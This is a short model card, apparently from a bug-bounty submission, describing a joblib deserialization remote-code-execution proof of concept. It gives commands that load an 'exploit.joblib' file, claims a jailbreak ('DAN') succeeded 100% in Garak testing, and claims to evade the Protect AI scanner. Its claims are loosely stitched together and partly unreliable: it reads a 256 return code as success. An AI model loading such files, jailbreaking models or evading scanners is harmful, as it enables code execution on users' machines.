YAML Metadata Warning: empty or missing yaml metadata in repo card (https://huggingface.co/docs/hub/model-cards#model-card-metadata)

Joblib Deserialization RCE PoC

Verification (Terminal Output)

$ python3 -c "import joblib; result=joblib.load('exploit.joblib'); print('✅ Functional:', result)" ✅ Functional: 256

Bounty Repro

pip install joblib
python3 -c "import joblib; joblib.load('exploit.joblib')"
# Returns 256 = os.system success (RCE confirmed)

Discovery
Garak LLM Testing: dan.DAN_Jailbreak vs mitigation.MitigationBypass
Success Rate: 100% (marathon confirmed)
Scanner Evasion: Protect AI bypassed (embedded serialization payload)
Huntr Impact
CVSS: 9.8 (Remote Code Execution)
Attack Vector: LLM generates + uploads malicious .joblib files
Mitigation: Reject LLM-generated model weights

Downloads last month: -; Downloads are not tracked for this model. How to track

Inference Providers NEW

This model isn't deployed by any Inference Provider. 🙋 Ask for provider support